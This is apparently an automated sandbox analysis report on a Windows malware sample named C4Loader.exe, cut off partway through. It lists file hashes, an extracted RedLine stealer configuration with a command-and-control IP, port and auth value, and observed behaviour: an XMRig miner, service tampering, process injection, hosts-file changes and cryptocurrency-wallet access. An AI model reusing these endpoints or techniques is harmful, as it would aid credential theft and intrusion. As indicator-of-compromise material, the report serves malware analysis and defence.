Analysis
-
max time kernel
143s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2022 23:23
Static task
static1
Behavioral task
behavioral1
Sample
C4Loader.exe
Resource
win7-20220812-en
General
-
Target
C4Loader.exe
-
Size
124KB
-
MD5
99f682f75994261bd769f11cd33820e7
-
SHA1
2d8f77e1aebc274f94c56626fe1a71514c01b439
-
SHA256
84374cb55c56fb530ef4f83f655ffeb7463e8c0452d7f13d57535d9e032e761f
-
SHA512
00ca067af16d76cd5e344065c3f6c223a5e35bf79b67759bfed26e1994bcbe36ca0ff0cfc10c4175659813a1501d8e5d9d64fbcaf98d92459ca052f15ff0f0db
-
SSDEEP
3072:x8Bwf9nPJ6+qVDRhIJTz7y1bJs6Httemsk3QnDPofdc:x8Snh2RIEJsKetudc
Malware Config
Extracted
redline
1
107.182.129.73:21733
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4460-201-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 17 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 1520 created 3276 1520 WerFault.exe DllHost.exe PID 3920 created 3364 3920 WerFault.exe DllHost.exe PID 4920 created 3328 4920 WerFault.exe DllHost.exe PID 4320 created 3456 4320 WerFault.exe DllHost.exe PID 2440 created 1816 2440 WerFault.exe DllHost.exe PID 4440 created 4520 4440 WerFault.exe DllHost.exe PID 4184 created 3956 4184 WerFault.exe DllHost.exe PID 3276 created 4168 3276 WerFault.exe DllHost.exe PID 3284 created 4748 3284 WerFault.exe DllHost.exe PID 952 created 224 952 WerFault.exe DllHost.exe PID 3564 created 1272 3564 WerFault.exe DllHost.exe PID 2892 created 3556 2892 WerFault.exe DllHost.exe PID 1648 created 1332 1648 WerFault.exe DllHost.exe PID 1972 created 1312 1972 WerFault.exe DllHost.exe PID 3164 created 2868 3164 WerFault.exe DllHost.exe PID 756 created 4184 756 WerFault.exe DllHost.exe PID 4280 created 4368 4280 WerFault.exe DllHost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 30 IoCs
Processes:
SmartDefRun.exeSmartScreenQC.exedialer.exepowershell.EXEsvchost.exedescription pid process target process PID 2032 created 3060 2032 SmartDefRun.exe Explorer.EXE PID 2032 created 3060 2032 SmartDefRun.exe Explorer.EXE PID 2032 created 3060 2032 SmartDefRun.exe Explorer.EXE PID 2032 created 3060 2032 SmartDefRun.exe Explorer.EXE PID 2032 created 3060 2032 SmartDefRun.exe Explorer.EXE PID 4836 created 3060 4836 SmartScreenQC.exe Explorer.EXE PID 4836 created 3060 4836 SmartScreenQC.exe Explorer.EXE PID 4836 created 3060 4836 SmartScreenQC.exe Explorer.EXE PID 4836 created 3060 4836 SmartScreenQC.exe Explorer.EXE PID 5028 created 3060 5028 dialer.exe Explorer.EXE PID 4836 created 3060 4836 SmartScreenQC.exe Explorer.EXE PID 4836 created 3060 4836 SmartScreenQC.exe Explorer.EXE PID 344 created 576 344 powershell.EXE winlogon.exe PID 3288 created 3364 3288 svchost.exe DllHost.exe PID 3288 created 3276 3288 svchost.exe DllHost.exe PID 3288 created 3328 3288 svchost.exe DllHost.exe PID 3288 created 3456 3288 svchost.exe DllHost.exe PID 3288 created 1816 3288 svchost.exe DllHost.exe PID 3288 created 4520 3288 svchost.exe DllHost.exe PID 3288 created 3956 3288 svchost.exe DllHost.exe PID 3288 created 4168 3288 svchost.exe DllHost.exe PID 3288 created 4748 3288 svchost.exe DllHost.exe PID 3288 created 224 3288 svchost.exe DllHost.exe PID 3288 created 1272 3288 svchost.exe DllHost.exe PID 3288 created 3556 3288 svchost.exe DllHost.exe PID 3288 created 1332 3288 svchost.exe DllHost.exe PID 3288 created 1312 3288 svchost.exe DllHost.exe PID 3288 created 2868 3288 svchost.exe DllHost.exe PID 3288 created 4184 3288 svchost.exe DllHost.exe PID 3288 created 4368 3288 svchost.exe DllHost.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4976-252-0x00007FF700E20000-0x00007FF701614000-memory.dmp xmrig behavioral2/memory/4976-256-0x00007FF700E20000-0x00007FF701614000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 30 4704 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
SmartDefRun.exeSmartScreenQC.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe File created C:\Windows\System32\drivers\etc\hosts SmartScreenQC.exe -
Executes dropped EXE 6 IoCs
Processes:
C4Loader.exenew2.exeSysApp.exeSmartDefRun.exeSmartScreenQC.exefodhelper.exepid process 2212 C4Loader.exe 5004 new2.exe 3444 SysApp.exe 2032 SmartDefRun.exe 4836 SmartScreenQC.exe 1676 fodhelper.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/4976-252-0x00007FF700E20000-0x00007FF701614000-memory.dmp upx behavioral2/memory/4976-256-0x00007FF700E20000-0x00007FF701614000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 9 IoCs
Processes:
svchost.exepowershell.exepowershell.EXEsvchost.exepowershell.EXEpowershell.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Telemetry Logging svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
C4Loader.exeSmartDefRun.exenew2.exeSmartScreenQC.exepowershell.EXEdescription pid process target process PID 1064 set thread context of 3900 1064 C4Loader.exe vbc.exe PID 2032 set thread context of 2436 2032 SmartDefRun.exe dialer.exe PID 5004 set thread context of 4460 5004 new2.exe vbc.exe PID 4836 set thread context of 5028 4836 SmartScreenQC.exe dialer.exe PID 4836 set thread context of 4976 4836 SmartScreenQC.exe dialer.exe PID 344 set thread context of 4400 344 powershell.EXE dllhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
SmartDefRun.execmd.exeSmartScreenQC.execmd.exedescription ioc process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\WR64.sys SmartScreenQC.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3208 sc.exe 1988 sc.exe 4388 sc.exe 4608 sc.exe 4024 sc.exe 5096 sc.exe 5036 sc.exe 3212 sc.exe 1492 sc.exe 3728 sc.exe -
Program crash 21 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4472 1064 WerFault.exe C4Loader.exe 3924 5004 WerFault.exe new2.exe 4992 3276 WerFault.exe DllHost.exe 5048 3364 WerFault.exe DllHost.exe 1652 3328 WerFault.exe DllHost.exe 4712 3456 WerFault.exe DllHost.exe 1764 1816 WerFault.exe DllHost.exe 1836 4520 WerFault.exe DllHost.exe 2136 3956 WerFault.exe DllHost.exe 5048 4168 WerFault.exe DllHost.exe 4128 4748 WerFault.exe DllHost.exe 4248 224 WerFault.exe DllHost.exe 3116 1272 WerFault.exe DllHost.exe 4548 3556 WerFault.exe DllHost.exe 3500 1332 WerFault.exe DllHost.exe 2928 1312 WerFault.exe DllHost.exe 856 2868 WerFault.exe DllHost.exe 3684 4184 WerFault.exe DllHost.exe 4388 4368 WerFault.exe DllHost.exe 3284 3408 WerFault.exe 1124 5036 WerFault.exe -
Checks processor information in registry 2 TTPs 48 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 32 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.EXEpowershell.exedialer.exepowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeSmartDefRun.exepowershell.exepowershell.exepowershell.exeSysApp.exeSmartScreenQC.exeC4Loader.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exevbc.exedialer.exedialer.exepid process 4704 powershell.exe 4704 powershell.exe 2032 SmartDefRun.exe 2032 SmartDefRun.exe 2272 powershell.exe 2272 powershell.exe 2032 SmartDefRun.exe 2032 SmartDefRun.exe 2032 SmartDefRun.exe 2032 SmartDefRun.exe 2040 powershell.exe 2040 powershell.exe 2032 SmartDefRun.exe 2032 SmartDefRun.exe 2032 SmartDefRun.exe 2032 SmartDefRun.exe 3744 powershell.exe 3744 powershell.exe 3444 SysApp.exe 3444 SysApp.exe 3444 SysApp.exe 3444 SysApp.exe 3444 SysApp.exe 3444 SysApp.exe 3444 SysApp.exe 3444 SysApp.exe 3444 SysApp.exe 3444 SysApp.exe 4836 SmartScreenQC.exe 4836 SmartScreenQC.exe 2212 C4Loader.exe 904 powershell.exe 904 powershell.exe 344 powershell.EXE 2080 powershell.EXE 344 powershell.EXE 2080 powershell.EXE 4836 SmartScreenQC.exe 4836 SmartScreenQC.exe 4836 SmartScreenQC.exe 4836 SmartScreenQC.exe 760 powershell.exe 760 powershell.exe 4460 vbc.exe 4836 SmartScreenQC.exe 4836 SmartScreenQC.exe 5028 dialer.exe 5028 dialer.exe 4836 SmartScreenQC.exe 4836 SmartScreenQC.exe 4836 SmartScreenQC.exe 4836 SmartScreenQC.exe 4976 dialer.exe 4976 dialer.exe 4976 dialer.exe 4976 dialer.exe 4976 dialer.exe 4976 dialer.exe 4976 dialer.exe 4976 dialer.exe 4976 dialer.exe 4976 dialer.exe 4976 dialer.exe 4976 dialer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 648 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeIncreaseQuotaPrivilege 2040 powershell.exe Token: SeSecurityPrivilege 2040 powershell.exe Token: SeTakeOwnershipPrivilege 2040 powershell.exe Token: SeLoadDriverPrivilege 2040 powershell.exe Token: SeSystemProfilePrivilege 2040 powershell.exe Token: SeSystemtimePrivilege 2040 powershell.exe Token: SeProfSingleProcessPrivilege 2040 powershell.exe Token: SeIncBasePriorityPrivilege 2040 powershell.exe Token: SeCreatePagefilePrivilege 2040 powershell.exe Token: SeBackupPrivilege 2040 powershell.exe Token: SeRestorePrivilege 2040 powershell.exe Token: SeShutdownPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeSystemEnvironmentPrivilege 2040 powershell.exe Token: SeRemoteShutdownPrivilege 2040 powershell.exe Token: SeUndockPrivilege 2040 powershell.exe Token: SeManageVolumePrivilege 2040 powershell.exe Token: 33 2040 powershell.exe Token: 34 2040 powershell.exe Token: 35 2040 powershell.exe Token: 36 2040 powershell.exe Token: SeIncreaseQuotaPrivilege 2040 powershell.exe Token: SeSecurityPrivilege 2040 powershell.exe Token: SeTakeOwnershipPrivilege 2040 powershell.exe Token: SeLoadDriverPrivilege 2040 powershell.exe Token: 